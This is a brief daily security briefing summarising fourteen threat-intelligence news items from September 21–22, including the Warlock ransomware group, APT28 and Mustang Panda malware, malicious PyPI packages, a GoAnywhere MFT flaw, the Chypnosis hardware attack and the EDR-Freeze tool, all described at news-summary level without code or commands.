This morning's security briefing covers fourteen InfoSec articles reviewed from Saturday, September 21st through Sunday, September 22nd.
Threat Intelligence.
GOLD SALEM, tracked by Microsoft as Storm-2603 and potentially China-based, has emerged as a new ransomware operation called Warlock Group with sixty published victims since March 2025. The group has notably posted a Russia-based victim to their leak site, suggesting they may operate outside Russian jurisdiction despite typical ransomware group avoidance of Russian targets.
APT28 continues leveraging legitimate web services for command and control, with recent campaigns abusing icedrive.net for bidirectional communication through their BeardShell malware. Bloody Wolf has been observed using STRRAT malware with extensive WMI queries to enumerate system information, disk volumes, and installed antivirus products for reconnaissance.
Malware.
SnakeDisk, attributed to Mustang Panda, represents a sophisticated USB worm that uses robocopy commands to move files and executables across removable media drives. Malicious PyPI packages sisaws and secmeasure are delivering SilentSync RAT through typosquatting attacks, retrieving payloads from Pastebin using curl commands.
Vulnerabilities.
A critical deserialization vulnerability has been identified in GoAnywhere MFT's License Servlet, though specific technical details remain under embargo. New research reveals Chypnosis, an undervolting-based attack technique that can bypass voltage sensors and extract cryptographic secrets even from hardened systems like OpenTitan root-of-trust implementations.
Tools.
EDR-Freeze exploits WerFaultSecure vulnerabilities to suspend EDR and antimalware processes without requiring vulnerable drivers, operating entirely in user mode on Windows 11 24H2. SEO poisoning campaigns are increasingly using JavaScript redirects and meta refresh tags to deliver RATs and potentially unwanted programs through manipulated search results.